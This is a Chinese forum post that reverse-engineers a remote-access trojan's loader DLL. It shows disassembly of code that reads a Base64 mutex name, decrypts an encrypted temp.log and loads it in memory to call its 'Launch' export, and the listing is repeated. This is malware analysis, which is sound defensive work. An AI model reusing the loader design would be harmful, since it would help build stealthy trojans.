首页
社区
课程
招聘
[原创]记一次远控木马的分析
发表于: 2018-2-8 23:48 7259

[原创]记一次远控木马的分析

2018-2-8 23:48
7259
朋友电脑中毒,从他的电脑拷出来的...

环境: win7 x32 
工具: OD     IDA         DLL Export Viewer         LordPE



control.txt 放了一段疑似Base64加密后的文本

尝试揭秘后
解密前: N1hZMG9NTjhvVHwyMDk5MjA=

解密后: 7XY0oMN8oT|209920

temp.log里则是乱码  肯定是被加密了

解密前: N1hZMG9NTjhvVHwyMDk5MjA=

解密后: 7XY0oMN8oT|209920

temp.log里则是乱码  肯定是被加密了

help.exe  好像是vs的资源编辑器 



rcdll.dll  加了UPX 这里用了esp定律直接脱掉  
看下他的两个导出函数
100012E0 RCDLL.Handler     $  C3            retn
100012E1                      90            nop
100012E2                      90            nop
100012E3                      90            nop


100012E0 RCDLL.Handler     $  C3            retn
100012E1                      90            nop
100012E2                      90            nop
100012E3                      90            nop

100010C0 RCDLL.RC         /$  81EC 14030000 sub esp,0x314
100010C6                  |.  53            push ebx
100010C7                  |.  55            push ebp
100010C8                  |.  56            push esi
100010C9                  |.  57            push edi
100010CA                  |.  33DB          xor ebx,ebx
100010CC                  |.  B9 40000000   mov ecx,0x40
100010D1                  |.  33C0          xor eax,eax
100010D3                  |.  8D7C24 19     lea edi,dword ptr ss:[esp+0x19]
100010D7                  |.  885C24 18     mov byte ptr ss:[esp+0x18],bl
100010DB                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100010E0                  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
100010E2                  |.  66:AB         stos word ptr es:[edi]                   ; |
100010E4                  |.  AA            stos byte ptr es:[edi]                   ; |
100010E5                  |.  8D4424 1C     lea eax,dword ptr ss:[esp+0x1C]          ; |
100010E9                  |.  50            push eax                                 ; |PathBuffer
100010EA                  |.  53            push ebx                                 ; |hModule => NULL
100010EB                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100010F1                  |.  8D4C24 18     lea ecx,dword ptr ss:[esp+0x18]
100010F5                  |.  51            push ecx                                 ; /Path
100010F6                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
100010FC                  |.  8D5424 18     lea edx,dword ptr ss:[esp+0x18]
10001100                  |.  68 48800010   push 10008048                            ; /StringToAdd = "\control.txt"
10001105                  |.  52            push edx                                 ; |ConcatString
10001106                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
1000110C                  |.  53            push ebx                                 ; /hTemplateFile => NULL
1000110D                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
10001112                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001114                  |.  53            push ebx                                 ; |pSecurity => NULL
10001115                  |.  6A 03         push 0x3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117                  |.  8D4424 2C     lea eax,dword ptr ss:[esp+0x2C]          ; |
1000111B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001120                  |.  50            push eax                                 ; |FileName
10001121                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001127                  |.  8BF8          mov edi,eax
10001129                  |.  53            push ebx                                 ; /pFileSizeHigh => NULL
1000112A                  |.  57            push edi                                 ; |hFile
1000112B                  |.  895C24 18     mov dword ptr ss:[esp+0x18],ebx          ; |
1000112F                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001135                  |.  8BE8          mov ebp,eax
10001137                  |.  55            push ebp
10001138                  |.  E8 070A0000   call 10001B44
1000113D                  |.  83C4 04       add esp,0x4
10001140                  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
10001144                  |.  8BF0          mov esi,eax
10001146                  |.  53            push ebx                                 ; /pOverlapped
10001147                  |.  51            push ecx                                 ; |pBytesRead
10001148                  |.  55            push ebp                                 ; |BytesToRead
10001149                  |.  56            push esi                                 ; |Buffer
1000114A                  |.  57            push edi                                 ; |hFile
1000114B                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001151                  |.  8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C]        ;  kernel32.CloseHandle
10001157                  |.  57            push edi                                 ; /hObject
10001158                  |.  FFD5          call ebp                                 ; \CloseHandle
1000115A                  |.  56            push esi                                 ; /MutexName
1000115B                  |.  53            push ebx                                 ; |InitialOwner
1000115C                  |.  53            push ebx                                 ; |pSecurity
1000115D                  |.  FF15 18700010 call dword ptr ds:[0x10007018]           ; \CreateMutexA
10001163                  |.  8BF8          mov edi,eax
10001165                  |.  FF15 14700010 call dword ptr ds:[0x10007014]           ; [GetLastError
1000116B                  |.  3D B7000000   cmp eax,0xB7
10001170                  |.  75 0A         jnz short 1000117C
10001172                  |.  57            push edi                                 ; /hObject
10001173                  |.  FFD5          call ebp                                 ; \CloseHandle
10001175                  |.  53            push ebx                                 ; /ExitCode
10001176                  |.  FF15 10700010 call dword ptr ds:[0x10007010]           ; \ExitProcess
1000117C                  |>  B9 40000000   mov ecx,0x40
10001181                  |.  33C0          xor eax,eax
10001183                  |.  8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A                  |.  889C24 200200>mov byte ptr ss:[esp+0x220],bl
10001191                  |.  F3:AB         rep stos dword ptr es:[edi]
10001193                  |.  66:AB         stos word ptr es:[edi]
10001195                  |.  AA            stos byte ptr es:[edi]
10001196                  |.  8B4424 10     mov eax,dword ptr ss:[esp+0x10]
1000119A                  |.  8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1                  |.  52            push edx
100011A2                  |.  50            push eax
100011A3                  |.  56            push esi
100011A4                  |.  E8 67010000   call 10001310                            ;  Base64 解密
100011A9                  |.  8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C]
100011B0                  |.  68 44800010   push 10008044                            ;  UNICODE "|"
100011B5                  |.  51            push ecx
100011B6                  |.  E8 E5080000   call 10001AA0
100011BB                  |.  83C4 14       add esp,0x14
100011BE                  |.  50            push eax                                 ; /String2
100011BF                  |.  68 00AB0010   push 1000AB00                            ; |String1 = RCDLL.1000AB00
100011C4                  |.  FF15 0C700010 call dword ptr ds:[0x1000700C]           ; \lstrcpyA
100011CA                  |.  B9 40000000   mov ecx,0x40
100011CF                  |.  33C0          xor eax,eax
100011D1                  |.  8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8                  |.  889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl
100011DF                  |.  F3:AB         rep stos dword ptr es:[edi]
100011E1                  |.  66:AB         stos word ptr es:[edi]
100011E3                  |.  8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100011EF                  |.  52            push edx                                 ; |PathBuffer
100011F0                  |.  53            push ebx                                 ; |hModule
100011F1                  |.  AA            stos byte ptr es:[edi]                   ; |
100011F2                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100011F8                  |.  8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF                  |.  50            push eax                                 ; /Path
10001200                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
10001206                  |.  8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D                  |.  68 38800010   push 10008038                            ; /StringToAdd = "\temp.log"
10001212                  |.  51            push ecx                                 ; |ConcatString
10001213                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
10001219                  |.  53            push ebx                                 ; /hTemplateFile
1000121A                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
1000121F                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001221                  |.  53            push ebx                                 ; |pSecurity
10001222                  |.  6A 01         push 0x1                                 ; |ShareMode = FILE_SHARE_READ
10001224                  |.  8D9424 300100>lea edx,dword ptr ss:[esp+0x130]         ; |
1000122B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001230                  |.  52            push edx                                 ; |FileName
10001231                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001237                  |.  8BF0          mov esi,eax
10001239                  |.  53            push ebx                                 ; /pFileSizeHigh
1000123A                  |.  56            push esi                                 ; |hFile
1000123B                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001241                  |.  8BF8          mov edi,eax
10001243                  |.  895C24 14     mov dword ptr ss:[esp+0x14],ebx
10001247                  |.  57            push edi
10001248                  |.  E8 F7080000   call 10001B44
1000124D                  |.  83C4 04       add esp,0x4
10001250                  |.  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]
10001254                  |.  A3 08AC0010   mov dword ptr ds:[0x1000AC08],eax
10001259                  |.  53            push ebx                                 ; /pOverlapped
1000125A                  |.  51            push ecx                                 ; |pBytesRead
1000125B                  |.  57            push edi                                 ; |BytesToRead
1000125C                  |.  50            push eax                                 ; |Buffer
1000125D                  |.  56            push esi                                 ; |hFile
1000125E                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001264                  |.  56            push esi
10001265                  |.  FFD5          call ebp
10001267                  |.  8B5424 14     mov edx,dword ptr ss:[esp+0x14]
1000126B                  |.  52            push edx                                 ;  文件大小
1000126C                  |.  68 08AC0010   push 1000AC08                            ;  文件buf
10001271                  |.  E8 8AFDFFFF   call 10001000                            ;  解密call
10001276                  |.  A1 08AC0010   mov eax,dword ptr ds:[0x1000AC08]
1000127B                  |.  50            push eax
1000127C                  |.  E8 2F020000   call 100014B0                            ;  加载dll
10001281                  |.  83C4 0C       add esp,0xC
10001284                  |.  3BC3          cmp eax,ebx
10001286                  |.  A3 F8AA0010   mov dword ptr ds:[0x1000AAF8],eax
1000128B                  |.  74 3D         je short 100012CA
1000128D                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
10001292                  |.  50            push eax
10001293                  |.  E8 C8060000   call 10001960                            ;  GetProcAddress 获取Launch函数地址
10001298                  |.  83C4 08       add esp,0x8
1000129B                  |.  3BC3          cmp eax,ebx
1000129D                  |.  74 19         je short 100012B8
1000129F                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
100012A4                  |.  FFD0          call eax                                 ;  调用Launch
100012A6                  |.  8B35 08700010 mov esi,dword ptr ds:[0x10007008]        ;  kernel32.Sleep
100012AC                  |.  83C4 04       add esp,0x4
100012AF                  |>  68 A0860100   /push 0x186A0
100012B4                  |.  FFD6          |call esi
100012B6                  |.^ EB F7         \jmp short 100012AF
100012B8                  |>  A1 F8AA0010   mov eax,dword ptr ds:[0x1000AAF8]
100012BD                  |.  3BC3          cmp eax,ebx
100012BF                  |.  74 09         je short 100012CA
100012C1                  |.  50            push eax
100012C2                  |.  E8 E9010000   call 100014B0
100012C7                  |.  83C4 04       add esp,0x4
100012CA                  |>  5F            pop edi
100012CB                  |.  5E            pop esi
100012CC                  |.  5D            pop ebp
100012CD                  |.  5B            pop ebx
100012CE                  |.  81C4 14030000 add esp,0x314
100012D4                  \.  C3            retn



直接定位关键点 
(1) 读入文件目录下的control.txt
(2)用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 创建互斥体 ,如果创建失败,则结束进程


100010C0 RCDLL.RC         /$  81EC 14030000 sub esp,0x314
100010C6                  |.  53            push ebx
100010C7                  |.  55            push ebp
100010C8                  |.  56            push esi
100010C9                  |.  57            push edi
100010CA                  |.  33DB          xor ebx,ebx
100010CC                  |.  B9 40000000   mov ecx,0x40
100010D1                  |.  33C0          xor eax,eax
100010D3                  |.  8D7C24 19     lea edi,dword ptr ss:[esp+0x19]
100010D7                  |.  885C24 18     mov byte ptr ss:[esp+0x18],bl
100010DB                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100010E0                  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
100010E2                  |.  66:AB         stos word ptr es:[edi]                   ; |
100010E4                  |.  AA            stos byte ptr es:[edi]                   ; |
100010E5                  |.  8D4424 1C     lea eax,dword ptr ss:[esp+0x1C]          ; |
100010E9                  |.  50            push eax                                 ; |PathBuffer
100010EA                  |.  53            push ebx                                 ; |hModule => NULL
100010EB                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100010F1                  |.  8D4C24 18     lea ecx,dword ptr ss:[esp+0x18]
100010F5                  |.  51            push ecx                                 ; /Path
100010F6                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
100010FC                  |.  8D5424 18     lea edx,dword ptr ss:[esp+0x18]
10001100                  |.  68 48800010   push 10008048                            ; /StringToAdd = "\control.txt"
10001105                  |.  52            push edx                                 ; |ConcatString
10001106                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
1000110C                  |.  53            push ebx                                 ; /hTemplateFile => NULL
1000110D                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
10001112                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001114                  |.  53            push ebx                                 ; |pSecurity => NULL
10001115                  |.  6A 03         push 0x3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117                  |.  8D4424 2C     lea eax,dword ptr ss:[esp+0x2C]          ; |
1000111B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001120                  |.  50            push eax                                 ; |FileName
10001121                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001127                  |.  8BF8          mov edi,eax
10001129                  |.  53            push ebx                                 ; /pFileSizeHigh => NULL
1000112A                  |.  57            push edi                                 ; |hFile
1000112B                  |.  895C24 18     mov dword ptr ss:[esp+0x18],ebx          ; |
1000112F                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001135                  |.  8BE8          mov ebp,eax
10001137                  |.  55            push ebp
10001138                  |.  E8 070A0000   call 10001B44
1000113D                  |.  83C4 04       add esp,0x4
10001140                  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
10001144                  |.  8BF0          mov esi,eax
10001146                  |.  53            push ebx                                 ; /pOverlapped
10001147                  |.  51            push ecx                                 ; |pBytesRead
10001148                  |.  55            push ebp                                 ; |BytesToRead
10001149                  |.  56            push esi                                 ; |Buffer
1000114A                  |.  57            push edi                                 ; |hFile
1000114B                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001151                  |.  8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C]        ;  kernel32.CloseHandle
10001157                  |.  57            push edi                                 ; /hObject
10001158                  |.  FFD5          call ebp                                 ; \CloseHandle
1000115A                  |.  56            push esi                                 ; /MutexName
1000115B                  |.  53            push ebx                                 ; |InitialOwner
1000115C                  |.  53            push ebx                                 ; |pSecurity
1000115D                  |.  FF15 18700010 call dword ptr ds:[0x10007018]           ; \CreateMutexA
10001163                  |.  8BF8          mov edi,eax
10001165                  |.  FF15 14700010 call dword ptr ds:[0x10007014]           ; [GetLastError
1000116B                  |.  3D B7000000   cmp eax,0xB7
10001170                  |.  75 0A         jnz short 1000117C
10001172                  |.  57            push edi                                 ; /hObject
10001173                  |.  FFD5          call ebp                                 ; \CloseHandle
10001175                  |.  53            push ebx                                 ; /ExitCode
10001176                  |.  FF15 10700010 call dword ptr ds:[0x10007010]           ; \ExitProcess
1000117C                  |>  B9 40000000   mov ecx,0x40
10001181                  |.  33C0          xor eax,eax
10001183                  |.  8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A                  |.  889C24 200200>mov byte ptr ss:[esp+0x220],bl
10001191                  |.  F3:AB         rep stos dword ptr es:[edi]
10001193                  |.  66:AB         stos word ptr es:[edi]
10001195                  |.  AA            stos byte ptr es:[edi]
10001196                  |.  8B4424 10     mov eax,dword ptr ss:[esp+0x10]
1000119A                  |.  8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1                  |.  52            push edx
100011A2                  |.  50            push eax
100011A3                  |.  56            push esi
100011A4                  |.  E8 67010000   call 10001310                            ;  Base64 解密
100011A9                  |.  8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C]
100011B0                  |.  68 44800010   push 10008044                            ;  UNICODE "|"
100011B5                  |.  51            push ecx
100011B6                  |.  E8 E5080000   call 10001AA0
100011BB                  |.  83C4 14       add esp,0x14
100011BE                  |.  50            push eax                                 ; /String2
100011BF                  |.  68 00AB0010   push 1000AB00                            ; |String1 = RCDLL.1000AB00
100011C4                  |.  FF15 0C700010 call dword ptr ds:[0x1000700C]           ; \lstrcpyA
100011CA                  |.  B9 40000000   mov ecx,0x40
100011CF                  |.  33C0          xor eax,eax
100011D1                  |.  8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8                  |.  889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl
100011DF                  |.  F3:AB         rep stos dword ptr es:[edi]
100011E1                  |.  66:AB         stos word ptr es:[edi]
100011E3                  |.  8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100011EF                  |.  52            push edx                                 ; |PathBuffer
100011F0                  |.  53            push ebx                                 ; |hModule
100011F1                  |.  AA            stos byte ptr es:[edi]                   ; |
100011F2                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100011F8                  |.  8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF                  |.  50            push eax                                 ; /Path
10001200                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
10001206                  |.  8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D                  |.  68 38800010   push 10008038                            ; /StringToAdd = "\temp.log"
10001212                  |.  51            push ecx                                 ; |ConcatString
10001213                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
10001219                  |.  53            push ebx                                 ; /hTemplateFile
1000121A                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
1000121F                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001221                  |.  53            push ebx                                 ; |pSecurity
10001222                  |.  6A 01         push 0x1                                 ; |ShareMode = FILE_SHARE_READ
10001224                  |.  8D9424 300100>lea edx,dword ptr ss:[esp+0x130]         ; |
1000122B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001230                  |.  52            push edx                                 ; |FileName
10001231                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001237                  |.  8BF0          mov esi,eax
10001239                  |.  53            push ebx                                 ; /pFileSizeHigh
1000123A                  |.  56            push esi                                 ; |hFile
1000123B                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001241                  |.  8BF8          mov edi,eax
10001243                  |.  895C24 14     mov dword ptr ss:[esp+0x14],ebx
10001247                  |.  57            push edi
10001248                  |.  E8 F7080000   call 10001B44
1000124D                  |.  83C4 04       add esp,0x4
10001250                  |.  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]
10001254                  |.  A3 08AC0010   mov dword ptr ds:[0x1000AC08],eax
10001259                  |.  53            push ebx                                 ; /pOverlapped
1000125A                  |.  51            push ecx                                 ; |pBytesRead
1000125B                  |.  57            push edi                                 ; |BytesToRead
1000125C                  |.  50            push eax                                 ; |Buffer
1000125D                  |.  56            push esi                                 ; |hFile
1000125E                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001264                  |.  56            push esi
10001265                  |.  FFD5          call ebp
10001267                  |.  8B5424 14     mov edx,dword ptr ss:[esp+0x14]
1000126B                  |.  52            push edx                                 ;  文件大小
1000126C                  |.  68 08AC0010   push 1000AC08                            ;  文件buf
10001271                  |.  E8 8AFDFFFF   call 10001000                            ;  解密call
10001276                  |.  A1 08AC0010   mov eax,dword ptr ds:[0x1000AC08]
1000127B                  |.  50            push eax
1000127C                  |.  E8 2F020000   call 100014B0                            ;  加载dll
10001281                  |.  83C4 0C       add esp,0xC
10001284                  |.  3BC3          cmp eax,ebx
10001286                  |.  A3 F8AA0010   mov dword ptr ds:[0x1000AAF8],eax
1000128B                  |.  74 3D         je short 100012CA
1000128D                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
10001292                  |.  50            push eax
10001293                  |.  E8 C8060000   call 10001960                            ;  GetProcAddress 获取Launch函数地址
10001298                  |.  83C4 08       add esp,0x8
1000129B                  |.  3BC3          cmp eax,ebx
1000129D                  |.  74 19         je short 100012B8
1000129F                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
100012A4                  |.  FFD0          call eax                                 ;  调用Launch
100012A6                  |.  8B35 08700010 mov esi,dword ptr ds:[0x10007008]        ;  kernel32.Sleep
100012AC                  |.  83C4 04       add esp,0x4
100012AF                  |>  68 A0860100   /push 0x186A0
100012B4                  |.  FFD6          |call esi
100012B6                  |.^ EB F7         \jmp short 100012AF
100012B8                  |>  A1 F8AA0010   mov eax,dword ptr ds:[0x1000AAF8]
100012BD                  |.  3BC3          cmp eax,ebx
100012BF                  |.  74 09         je short 100012CA
100012C1                  |.  50            push eax
100012C2                  |.  E8 E9010000   call 100014B0
100012C7                  |.  83C4 04       add esp,0x4
100012CA                  |>  5F            pop edi
100012CB                  |.  5E            pop esi
100012CC                  |.  5D            pop ebp
100012CD                  |.  5B            pop ebx
100012CE                  |.  81C4 14030000 add esp,0x314
100012D4                  \.  C3            retn



直接定位关键点 
(1) 读入文件目录下的control.txt
(2)用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 创建互斥体 ,如果创建失败,则结束进程


(3) 将  N1hZMG9NTjhvVHwyMDk5MjA=   进行解密    解密的结果与刚开始猜测的一样
(4) 把解密后内容  7XY0oMN8oT|209920   以 " | " 进行分割 并将   7XY0oMN8oT  用 lstrcoyA 到 0x1000AB00



(5) 读入当前目录 temp.log  并进行解密


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 1
支持
分享
最新回复 (3)
雪    币: 56
活跃值: (24)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
不明觉厉
2018-2-9 00:07
0
雪    币: 861
活跃值: (683)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
3
C&C部分没多少呀
2018-3-20 15:55
0
游客
登录 | 注册 方可回帖
返回
//